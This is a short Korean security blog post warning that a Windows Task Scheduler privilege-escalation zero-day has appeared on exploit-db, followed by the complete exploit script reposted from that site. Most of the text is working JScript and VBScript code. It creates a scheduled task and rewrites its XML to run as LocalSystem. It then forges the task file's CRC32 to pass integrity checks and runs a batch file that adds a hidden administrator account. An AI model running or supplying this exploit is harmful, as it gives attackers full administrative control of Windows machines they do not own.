외국의 취약점 공개 사이트인 www.exploit-db.com에서 윈도우의 예약 작업에 관련된 제로데이 코드가 발표되었습니다.

다행이 취약점의 특성상 웹과 같이 외부적인 요소로 인한 공격이 주효하지 않을 것으로 보이지만, 악성코드 등과 같이 로컬로 동작할 경우에는 치명적인 영향을 미칠 가능성이 있으므로 주의해야 합니다.

아직 해결책이나 보완책이 나오지 않았습니다.

# Exploit Title: Windows Task Scheduler Privilege Escalation 0day
# Date: 20-11-2010
# Author: webDEViL
# Tested on: Windows 7/2008 x86/x64
 
 
<job id="tasksch-wD-0day">
<script language="Javascript">
 
crc_table = new Array(
  0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419,
  0x706AF48F, 0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4,
  0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07,
  0x90BF1D91, 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE,
  0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7, 0x136C9856,
  0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9,
  0xFA0F3D63, 0x8D080DF5, 0x3B6E20C8, 0x4C69105E, 0xD56041E4,
  0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
  0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3,
  0x45DF5C75, 0xDCD60DCF, 0xABD13D59, 0x26D930AC, 0x51DE003A,
  0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599,
  0xB8BDA50F, 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924,
  0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D, 0x76DC4190,
  0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F,
  0x9FBFE4A5, 0xE8B8D433, 0x7807C9A2, 0x0F00F934, 0x9609A88E,
  0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,
  0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED,
  0x1B01A57B, 0x8208F4C1, 0xF50FC457, 0x65B0D9C6, 0x12B7E950,
  0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3,
  0xFBD44C65, 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2,
  0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB, 0x4369E96A,
  0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5,
  0xAA0A4C5F, 0xDD0D7CC9, 0x5005713C, 0x270241AA, 0xBE0B1010,
  0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,
  0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17,
  0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD, 0xEDB88320, 0x9ABFB3B6,
  0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615,
  0x73DC1683, 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8,
  0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1, 0xF00F9344,
  0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB,
  0x196C3671, 0x6E6B06E7, 0xFED41B76, 0x89D32BE0, 0x10DA7A5A,
  0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,
  0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1,
  0xA6BC5767, 0x3FB506DD, 0x48B2364B, 0xD80D2BDA, 0xAF0A1B4C,
  0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF,
  0x4669BE79, 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236,
  0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F, 0xC5BA3BBE,
  0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31,
  0x2CD99E8B, 0x5BDEAE1D, 0x9B64C2B0, 0xEC63F226, 0x756AA39C,
  0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,
  0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B,
  0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21, 0x86D3D2D4, 0xF1D4E242,
  0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1,
  0x18B74777, 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C,
  0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45, 0xA00AE278,
  0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7,
  0x4969474D, 0x3E6E77DB, 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66,
  0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,
  0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605,
  0xCDD70693, 0x54DE5729, 0x23D967BF, 0xB3667A2E, 0xC4614AB8,
  0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B,
  0x2D02EF8D
);
 
var hD='0123456789ABCDEF';
 
function dec2hex(d) {
h='';
for (i=0;i<8;i++) {
h = hD.charAt(d&15)+h;
d >>>= 4;
}
return h;
}
function encodeToHex(str){
    var r="";
    var e=str.length;
    var c=0;
    var h;
    while(c<e){
        h=str.charCodeAt(c++).toString(16);
        while(h.length<3) h="0"+h;
        r+=h;
    }
    return r;
}
function decodeFromHex(str){
    var r="";
    var e=str.length;
    var s=0;
    while(e>1){
         
        r=r+String.fromCharCode("0x"+str.substring(s,s+2));
         
        s=s+2;
        e=e-2;
    }
     
    return r;
     
}
 
 
function calc_crc(anyForm) {
 
anyTextString=decodeFromHex(anyForm);
 
Crc_value = 0xFFFFFFFF;
StringLength=anyTextString.length;
for (i=0; i<StringLength; i++) {
tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;
Table_value = crc_table[tableIndex];
Crc_value >>>= 8;
Crc_value ^= Table_value;
}
Crc_value ^= 0xFFFFFFFF;
return dec2hex(Crc_value);
 
}
 
function rev_crc(leadString,endString,crc32) {
//
// First, we calculate the CRC-32 for the initial string
//
    anyTextString=decodeFromHex(leadString);
     
   Crc_value = 0xFFFFFFFF;
   StringLength=anyTextString.length;
   //document.write(alert(StringLength));
   for (var i=0; i<StringLength; i++) {
      tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;
      Table_value = crc_table[tableIndex];
      Crc_value >>>= 8;
      Crc_value ^= Table_value;
   }
//
// Second, we calculate the CRC-32 without the final string
//
   crc=parseInt(crc32,16);
   crc ^= 0xFFFFFFFF;
   anyTextString=decodeFromHex(endString);
   StringLength=anyTextString.length;
   for (var i=0; i<StringLength; i++) {
      tableIndex=0;
      Table_value = crc_table[tableIndex];
      while (((Table_value ^ crc) >>> 24)  & 0xFF) {
         tableIndex++;
         Table_value = crc_table[tableIndex];
      }
      crc ^= Table_value;
      crc <<= 8;
      crc |= tableIndex ^ anyTextString.charCodeAt(StringLength - i -1);
   }
//
// Now let's find the 4-byte string
//
   for (var i=0; i<4; i++) {
      tableIndex=0;
      Table_value = crc_table[tableIndex];
      while (((Table_value ^ crc) >>> 24)  & 0xFF) {
         tableIndex++;
         Table_value = crc_table[tableIndex];
      }
      crc ^= Table_value;
      crc <<= 8;
      crc |= tableIndex;
   }
   crc ^= Crc_value;
//
// Finally, display the results
//
   var TextString=dec2hex(crc);
   var Teststring='';
Teststring=TextString.substring(6,8);
Teststring+=TextString.substring(4,6);
Teststring+=TextString.substring(2,4);
Teststring+=TextString.substring(0,2);
   return Teststring
}
function decodeFromHex(str){
    var r="";
    var e=str.length;
    var s=0;
    while(e>1){
         
        r=r+String.fromCharCode("0x"+str.substring(s,s+2));
         
        s=s+2;
        e=e-2;
    }
     
    return r;
     
}
</script>
 
 
 
<script language="VBScript">
dim output
set output = wscript.stdout
output.writeline " Task Scheduler 0 day - Privilege Escalation "
output.writeline " Should work on Vista/Win7/2008 x86/x64"
output.writeline " webDEViL - w3bd3vil [at] gmail [dot] com" & vbCr & vbLf
biatchFile = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)+"\xpl.bat"
Set objShell = CreateObject("WScript.Shell")
objShell.Run "schtasks /create /TN wDw00t /sc monthly /tr """+biatchFile+"""",,True
 
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.CreateTextFile(biatchFile, True)
a.WriteLine ("net user /add test123 test123")
a.WriteLine ("net localgroup administrators /add test123")
a.WriteLine ("schtasks /delete /f /TN wDw00t")
 
Function ReadByteArray(strFileName)
Const adTypeBinary = 1
Dim bin
    Set bin = CreateObject("ADODB.Stream")
    bin.Type = adTypeBinary
    bin.Open
    bin.LoadFromFile strFileName
    ReadByteArray = bin.Read
'output.writeline ReadByteArray
End Function
 
Function OctetToHexStr (arrbytOctet)
 Dim k
 OctetToHexStr = ""
 For k = 3 To Lenb (arrbytOctet)
  OctetToHexStr = OctetToHexStr _
        & Right("0" & Hex(Ascb(Midb(arrbytOctet, k, 1))), 2)
 Next
 End Function
strFileName="C:\windows\system32\tasks\wDw00t"
 
hexXML = OctetToHexStr (ReadByteArray(strFileName))
'output.writeline hexXML
crc32 = calc_crc(hexXML)
output.writeline "Crc32 Original: "+crc32
 
 
Set xmlDoc = CreateObject("Microsoft.XMLDOM")
'permissions workaround
'objShell.Run "cmd /c copy C:\windows\system32\tasks\wDw00t .",,True
'objShell.Run "cmd /c schtasks /query /XML /TN wDw00t > wDw00t.xml",,True
Set objShell = WScript.CreateObject("WScript.Shell")
Set objExecObject = objShell.Exec("cmd /c schtasks /query /XML /TN wDw00t")
 
Do Until objExecObject.StdOut.AtEndOfStream
 strLine = strLine & objExecObject.StdOut.ReadLine()
Loop
hexXML = "FFFE3C00"+OctetToHexStr(strLine)
'output.writeline hexXML
Set ts = fso.createtextfile ("wDw00t.xml")
For n = 1 To (Len (hexXML) - 1) step 2
 ts.write Chr ("&h" & Mid (hexXML, n, 2))
Next
ts.close
 
xmlDoc.load "wDw00t.xml"
Set Author = xmlDoc.selectsinglenode ("//Task/RegistrationInfo/Author")
Author.text = "LocalSystem"
Set UserId = xmlDoc.selectsinglenode ("//Task/Principals/Principal/UserId")
UserId.text = "S-1-5-18"
xmldoc.save(strFileName)
 
hexXML = OctetToHexStr (ReadByteArray(strFileName))
 
leadString=hexXML+"3C0021002D002D00"
endString="2D002D003E00"
'output.writeline leadString
impbytes=rev_crc(leadString,endString,crc32)
output.writeline "Crc32 Magic Bytes: "+impbytes
 
finalString = leadString+impbytes+endString
forge = calc_crc(finalString)
output.writeline "Crc32 Forged: "+forge
 
strHexString="FFFE"+finalString
Set fso = CreateObject ("scripting.filesystemobject")
Set stream = CreateObject ("adodb.stream")
 
Set ts = fso.createtextfile (strFileName)
 
For n = 1 To (Len (strHexString) - 1) step 2
 ts.write Chr ("&h" & Mid (strHexString, n, 2))
Next
ts.close
 
 
Set objShell = CreateObject("WScript.Shell")
objShell.Run "schtasks /change /TN wDw00t /disable",,True
objShell.Run "schtasks /change /TN wDw00t /enable",,True
objShell.Run "schtasks /run /TN wDw00t",,True
 
</script>
</job>

출처: http://www.exploit-db.com/exploits/15589/

감사합니다.

reTweet
Posted by 문스랩닷컴
blog comments powered by Disqus


    Web Analytics Blogs Directory